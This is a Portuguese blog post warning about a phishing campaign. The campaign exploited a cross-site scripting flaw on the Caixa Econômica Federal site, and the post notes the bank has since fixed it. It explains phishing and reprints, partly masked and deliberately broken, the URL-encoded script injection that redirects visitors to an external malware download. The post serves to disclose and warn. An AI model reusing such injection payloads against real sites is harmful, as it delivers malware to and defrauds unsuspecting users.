UPDATE 25/05 19:24: Enquanto a programação do site cometeu um erro primário inserir uma variável no código fonte, eles tiveram um tempo de resposta adequado à seriedade da situação, acabei de testar a página, e ela não está mais aceitando a injeção.
Phising é o termo usado para descrever o processo em que se tentam obter dados, ilegalmente, através de algum artifício que leve o usuário de internet ao erro. Para quem não fala inglês, fica explicação de que o termo é falado da mesma forma que outra palavra do idioma, fishing, que quer dizer pescar. Então phishing seria o equivalente a pescar dados de usuários da internet, para óbvio uso fraudulento.
Normalmente é fácil reconhecer um phishing, qualquer pessoa minimamente atenta, se liga em verificar o endereço da URL que vai clicar, e se tiver um mínimo de bom senso, não vai entrar em sites que não batam com o endereço da entidade citada. Os que além de atentos são cuidadosos, entretanto, nem ao ponto de verificar as URLs chegarão, visto que vão descartar estes emails ANTES MESMO de ventilar a possibilidade de clicar, pois sabe que instituições sérias não solicitam recadastramento de forma tão insegura.
Mas infelizmente, poucos são cuidadosos, e vários nem ao menos atentos são.
Por isso este phishing que acompanha o email transcrito abaixo é tão perigoso.
Clique para ver a verão maior, nela você poderá ver que o endereço é do site da Caixa Econômica Federal
Aproveitando o descuido de um programador que não se deu ao cuidado de sanitizar algumas das URLs do site da caixa, e pior ainda, usar o dado colhido da URL para inserir dados dentro do código HTML, algum criminoso preparou uma linha de código que, anexada à URL, insere dentro da página da CEF uma chamada em Javascript que faz um download externo parecer, para os desatentos, um download vindo de uma página do Banco!!
A URL do phishing, transcrita abaixo, teve parte do nome oculto, e foi quebrada para não funcionar de propósito, mas ela é a seguinte:
http://www1.caixa.gov.br/atendimento/XOXOXOXOXOXOXOXO/XOXOXOXOXOXO.asp?XOXOXOXO=
%22%3E%3C%73%63XOXOXO%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%3D%
22%68%74%74%70%3A%2F%2F%78%69%76%63%69%73%6F%2E%65%64%75%63%61%63%61
%6F%2E%77%73%2F%70%72%6F%67%72%61%6D%61%63%61%6F%47%74%43%69%73%6F
%2F%69%6D%67%2F%65%78%69%62%69%72%2E%70%68%70%3F%63%61%69%78%61%2E
%67%6F%76%2E%62%72%3D%36%36%35%37%22%3B%3C%2F%73%63%72%69%70%74%3E
A parte que vem depois do símbolo “=”, é inserida DENTRO da página da Caixa, chamando o download.
E fica a dica: não tem anti-vírus, anti-malware, firewall, anti-spyware, ou qualquer coisa que venha a ser inventada que substitua o bom senso. NUNCA atenda a um pedido de cadastramento que chegar por email. Caso você sinta-se tentado à fazê-lo, fale primeiro com o atendimento telefônico da instituição que supostamente o mandou. 99,9999% das vezes, você vai ser informado que se trata de fishing.
O phishing foi informado à CEF às 15 horas de hoje, tomara que façam algo, e façam logo.
tag this | permalink | trackback url | comentários(2) 
